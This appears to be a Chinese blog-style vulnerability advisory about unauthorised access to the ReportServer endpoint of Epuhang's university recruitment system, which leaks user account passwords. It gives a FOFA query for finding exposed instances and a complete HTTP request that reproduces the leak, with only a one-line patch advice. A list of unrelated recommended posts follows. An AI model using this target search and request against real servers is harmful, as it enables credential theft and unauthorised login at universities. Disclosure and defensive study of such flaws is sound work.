易普行科技高校招聘系统 ReportServer 敏感信息泄露

0x01 产品描述:

‌**易普行科技的高校招聘系统** ‌是一个专门为国内高校提供人力资源管理信息化服务的系统,由北京易普行科技有限公司开发。该公司总部位于北京市海淀区,并在上海、广州、南京、武汉、西安、成都等城市设有分支机构,业务覆盖全国各地区,已有众多高校用户,在业内树立了良好的口碑‌。
0x02 漏洞描述:

易普行科技高校招聘系统/ReportServer接口存在未授权访问泄露用户账号密码等重要数据,导致攻击者可通过泄露实现登录。
0x03 搜索语句:

Fofa:body="FM_SYS_ID" || body="product/recruit/website/RecruitIndex.jsp"


0x04 漏洞复现:

复制代码
GET /ReportServer?op=Fr_server&cmd=Sc_getconnectioninfo HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*


0x05 修复建议:

厂商已发布补丁 请即时修复。

相关推荐
上海云盾商务经理杨杨4 分钟前
2025年API安全防御全解析:应对DDoS与CC攻击的智能策略
安全·web安全·ddos
小刘私坊3 小时前
人工智能与生命科学的深度融合:破解生物医学难题,引领未来科技革命
人工智能·科技
qq_339282234 小时前
安全核查基线-3.用户umask设置策略
安全
从零开始学习人工智能4 小时前
探索网络设备安全:Shodan 的原理与合法应用
网络·安全·php
夜风Sec5 小时前
【应急响应】- 日志流量如何分析?
安全
Blossom.1188 小时前
使用Python和TensorFlow实现图像分类的人工智能应用
开发语言·人工智能·python·深度学习·安全·机器学习·tensorflow
知识点集锦9 小时前
代发考试战报:思科华为HCIP HCSE CCNP 考试通过
网络·学习·安全·华为·云计算
瘾大侠9 小时前
赛季7靶场 - Environment
安全·web安全
weixin_4462608510 小时前
订阅“科技爱好者周刊”,每周五与你相约科技前沿!
科技
ZStack开发者社区10 小时前
云轴科技ZStack入选赛迪顾问2025AI Infra平台市场发展报告代表厂商
科技